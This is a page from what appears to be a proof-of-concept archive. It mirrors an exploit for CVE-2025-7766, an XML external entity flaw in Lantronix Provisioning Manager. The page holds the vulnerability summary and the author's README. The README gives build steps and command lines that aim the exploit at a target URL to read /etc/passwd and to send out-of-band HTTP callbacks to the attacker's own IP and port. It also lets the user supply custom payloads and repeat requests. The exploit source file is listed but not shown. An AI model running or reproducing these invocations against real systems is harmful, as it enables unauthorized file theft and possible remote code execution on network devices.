Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-7766 PoC — Lantronix Provisioning Manager 代码问题漏洞

Source
Associated Vulnerability
Title:Lantronix Provisioning Manager 代码问题漏洞 (CVE-2025-7766)
Description:Lantronix Provisioning Manager是美国Lantronix公司的一款用于网关配置和固件更新的软件。 Lantronix Provisioning Manager存在代码问题漏洞,该漏洞源于网络设备提供的配置文件存在XML外部实体攻击,可能导致未认证远程代码执行。
Description
PoC exploit for CVE-2025-7766 – XXE vulnerability leading to potential RCE.
Readme
# CVE-2025-7766 PoC Exploit

PoC for exploiting XML External Entity vulnerability in CVE-2025-7766. Demonstrates file read (/etc/passwd) and out-of-band HTTP callbacks.

**Author**: Byte Reaper

**Telegram**: @ByteReaper0

**CVE**: CVE-2025-7766

**Vulnerability**: Remote Code Execution via XML External Entity (XXE)

---

## PoC for exploiting XXE in CVE-2025-7766. Demonstrates:

* Reading `/etc/passwd` from the target.
* Triggering out-of-band HTTP request to your server.

## Requirements

* gcc
* libcurl
* argparse library

## Build

```
gcc -o exploit exploit.c argparse.c -lcurl
```

## Usage

```
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v
```

## LICENSE:
MIT 

File Snapshot

[4.0K] /data/pocs/ead46940883ffb8e90102c6a8d9708df62accdb5 ├── [ 14K] exploit.c ├── [1.0K] LICENSE └── [1.1K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.